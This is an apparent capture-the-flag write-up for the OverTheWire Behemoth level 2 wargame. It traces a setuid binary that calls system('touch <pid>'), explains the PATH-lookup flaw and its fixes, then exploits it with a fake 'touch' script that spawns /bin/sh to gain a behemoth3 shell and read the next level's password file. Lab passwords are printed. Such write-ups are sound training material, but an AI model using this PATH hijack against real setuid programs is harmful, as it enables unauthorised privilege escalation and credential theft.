# Behemoth wargame: Level 2


# ssh behemoth2@behemoth.labs.overthewire.org
behemoth2@behemoth.labs.overthewire.org's password:65696d61687175756f66

behemoth2@melissa$ file /behemoth/behemoth2
/behemoth/behemoth2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth2@melissa$ ltrace /behemoth/behemoth2
__libc_start_main(0x8048534, 1, -10236, 0x8048620, 0x8048680 <unfinished ...>
getpid()                                                                     = 6046
sprintf("touch 6046", "touch %d", 6046)                                      = 10
__lxstat(3, "6046", 0xffffd6d4)                                              = -1
unlink("6046")                                                               = -1
system("touch 6046"touch: cannot touch `6046': Permission denied
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                       = 256
sleep(2000^C <unfinished ...>
--- SIGINT (Interrupt) ---
+++ killed by SIGINT +++
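
What the trace shows: the setuid binary formats the string "touch <pid>" and hands it to system(). The command name has no directory component, so the shell started by system() looks it up through PATH, and PATH is inherited from the calling user. Whichever file named touch comes first in PATH therefore runs with the binary's effective user, which is why the session below ends up as behemoth3.

The underlying defect is a privileged program shelling out with a caller-controlled environment. The fix is to create the file directly with open()/creat() instead of running a command, or, if an external program really is needed, to call it by absolute path through execve() with a fixed, minimal environment. When auditing setuid binaries, any system() or popen() call that appears in an ltrace run like the one above deserves a closer look.

behemoth2@melissa$ cat > /tmp/b2/touch << eof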
> /bin/sh
> eof
behemoth2@melissa$ chmod +x /tmp/b2/touch
behemoth2@melissa$ PATH=/tmp/b2:$PATH /behemoth/behemoth2
$ /usr/bin/whoami
behemoth3
$ /bin/cat /etc/behemoth_pass/behemoth3
6e69657465696469656c
